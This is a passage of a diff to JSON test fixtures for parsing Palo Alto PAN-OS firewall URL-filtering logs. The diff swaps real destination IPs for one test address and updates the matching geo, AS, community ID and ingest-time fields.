"panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -2644,7 +2676,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:OVE3ctnTt5X1L6qNDr4QILL0dFg=" + "community_id": "1:F3RR35PJD5v+Urj2swhFKPNEW48=" } }, "threat_category": "unknown", @@ -2689,8 +2721,8 @@ ], "network": { "community_id": [ - "1:h4Yhxi4lfeFiizTNiugYzEk9CM4=", - "1:OVE3ctnTt5X1L6qNDr4QILL0dFg=" + "1:vU7VzL3Xj2eUkxkv9pv4sbP7Yz4=", + "1:F3RR35PJD5v+Urj2swhFKPNEW48=" ], "transport": "tcp", "application": "ssl", @@ -2729,14 +2761,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767775983Z", - "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28185,1,52998,443,41060,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7741,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691741900Z", + "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28185,1,52998,443,41060,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7741,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:37.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -2759,26 +2791,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -2794,14 +2828,14 @@ "port": 52999, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28201,1,52999,443,9058,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7742,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28201,1,52999,443,9058,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7742,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -2816,7 +2850,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:bzhUSIQYpz+jY7TA+j8UmFOdJ08=" + "community_id": "1:ZVehaLmF/+EShaJw/YID4C2vAek=" } }, "threat_category": "unknown", @@ -2861,8 +2895,8 @@ ], "network": { "community_id": [ - "1:SsYXkesHdCi9Tx1qsjfCIH8mHm4=", - "1:bzhUSIQYpz+jY7TA+j8UmFOdJ08=" + "1:GGkceDGdBTFH7NghXgGJekE3E/Q=", + "1:ZVehaLmF/+EShaJw/YID4C2vAek=" ], "transport": "tcp", "application": "ssl", @@ -2901,14 +2935,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767780094Z", - "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28201,1,52999,443,9058,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7742,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691746200Z", + "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28201,1,52999,443,9058,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7742,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:37.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -2931,26 +2965,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -2966,14 +3002,14 @@ "port": 53001, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28148,1,53001,443,54846,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7743,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28148,1,53001,443,54846,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7743,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -2988,7 +3024,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:NRiTxPYsIvfOnUXhwuF5KPucNf8=" + "community_id": "1:sh19mSnccM57Tejs1XFa4RBfLBk=" } }, "threat_category": "unknown", @@ -3033,8 +3069,8 @@ ], "network": { "community_id": [ - "1:84WYKtahMlLwf+ZletWf/DNnE30=", - "1:NRiTxPYsIvfOnUXhwuF5KPucNf8=" + "1:41JadGG6xL4JI4SLComS6u8CFEE=", + "1:sh19mSnccM57Tejs1XFa4RBfLBk=" ], "transport": "tcp", "application": "ssl", @@ -3073,14 +3109,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767784173Z", - "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28148,1,53001,443,54846,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7743,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691751400Z", + "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28148,1,53001,443,54846,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7743,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:37.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -3103,26 +3139,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -3138,14 +3176,14 @@ "port": 53002, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28121,1,53002,443,52731,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7744,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28121,1,53002,443,52731,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7744,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -3160,7 +3198,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:9noBCzeHKSZpuQWETkS7W5mOTT0=" + "community_id": "1:A4eXJ9RP6cag3i4lZitT6KUjkvU=" } }, "threat_category": "unknown", @@ -3205,8 +3243,8 @@ ], "network": { "community_id": [ - "1:X4Zvg9D/bP0EYECRSLna3za4r68=", - "1:9noBCzeHKSZpuQWETkS7W5mOTT0=" + "1:wucCQjxCnajGFPXkiFJxInK2F/E=", + "1:A4eXJ9RP6cag3i4lZitT6KUjkvU=" ], "transport": "tcp", "application": "ssl", @@ -3245,14 +3283,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767940552Z", - "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28121,1,53002,443,52731,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7744,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691757800Z", + "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28121,1,53002,443,52731,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7744,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:37.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -3275,26 +3313,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -3310,14 +3350,14 @@ "port": 53003, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28228,1,53003,443,15165,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7745,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28228,1,53003,443,15165,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7745,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -3332,7 +3372,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:NQ3UU1pIt7hTJ2TYkbe6yjIVIsw=" + "community_id": "1:jkV0aA7YmsGvEx1Nsw8I6Wp4Fuo=" } }, "threat_category": "unknown", @@ -3377,8 +3417,8 @@ ], "network": { "community_id": [ - "1:greC2ffRfw5diAvjZvd+je5rhrk=", - "1:NQ3UU1pIt7hTJ2TYkbe6yjIVIsw=" + "1:waaV/9m4xZnrtSSeXWug8Q/F6y8=", + "1:jkV0aA7YmsGvEx1Nsw8I6Wp4Fuo=" ], "transport": "tcp", "application": "ssl", @@ -3417,14 +3457,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767955580Z", - "original": "Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28228,1,53003,443,15165,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7745,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691761900Z", + "original": "Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28228,1,53003,443,15165,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7745,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:38.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -3447,26 +3487,28 @@ "destination": { "nat": { "port": 443, - "ip": "23.72.137.131" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 20940, + "number": 4837, "organization": { - "name": "Akamai International B.V." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "23.72.137.131" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -3482,14 +3524,14 @@ "port": 53004, "ip": "192.168.15.224" }, - "message": "192.168.15.224,23.72.137.131,192.168.1.63,23.72.137.131,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28196,1,53004,443,53918,443,0x403000,tcp,block-url,\"b.scorecardresearch.com/\",(9999),business-and-economy,informational,client-to-server,7746,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28196,1,53004,443,53918,443,0x403000,tcp,block-url,\"b.scorecardresearch.com/\",(9999),business-and-economy,informational,client-to-server,7746,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "23.72.137.131" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -3504,7 +3546,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:pzcUv98hFdzW07/5bQ15jcEOAAM=" + "community_id": "1:8thKdEham83d9LtbvxFptMHz5g0=" } }, "threat_category": "unknown", @@ -3549,8 +3591,8 @@ ], "network": { "community_id": [ - "1:EcYXcH6rGmgtHGDCjUQcmM+hR0c=", - "1:pzcUv98hFdzW07/5bQ15jcEOAAM=" + "1:Y+Hllh666Eb09KOwoiC4xWQedM8=", + "1:8thKdEham83d9LtbvxFptMHz5g0=" ], "transport": "tcp", "application": "ssl", @@ -3589,14 +3631,14 @@ ], "ip": [ "192.168.15.224", - "23.72.137.131", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767968080Z", - "original": "Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,23.72.137.131,192.168.1.63,23.72.137.131,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28196,1,53004,443,53918,443,0x403000,tcp,block-url,\"b.scorecardresearch.com/\",(9999),business-and-economy,informational,client-to-server,7746,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691766900Z", + "original": "Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28196,1,53004,443,53918,443,0x403000,tcp,block-url,\"b.scorecardresearch.com/\",(9999),business-and-economy,informational,client-to-server,7746,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:38.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -3619,26 +3661,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -3654,14 +3698,14 @@ "port": 53000, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28007,1,53000,443,40792,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7747,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28007,1,53000,443,40792,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7747,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -3676,7 +3720,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:iHNZW72XqbNDDHf4ziF4MHkPsq8=" + "community_id": "1:jjEgdpZKKcV2KA1l0e1qHB2Wkk0=" } }, "threat_category": "unknown", @@ -3721,8 +3765,8 @@ ], "network": { "community_id": [ - "1:OX20k3mW9JzBo4RmzVjTtvOawu4=", - "1:iHNZW72XqbNDDHf4ziF4MHkPsq8=" + "1:HIkN3gcLbbEYtuFCK3Riedx38SM=", + "1:jjEgdpZKKcV2KA1l0e1qHB2Wkk0=" ], "transport": "tcp", "application": "ssl", @@ -3761,14 +3805,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767972695Z", - "original": "Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28007,1,53000,443,40792,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7747,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691770900Z", + "original": "Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28007,1,53000,443,40792,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7747,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:38.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -3791,26 +3835,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -3826,14 +3872,14 @@ "port": 53006, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28117,1,53006,443,54044,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7748,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28117,1,53006,443,54044,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7748,0x2000000000000000,192.168.0.0-192.168.255.255,United 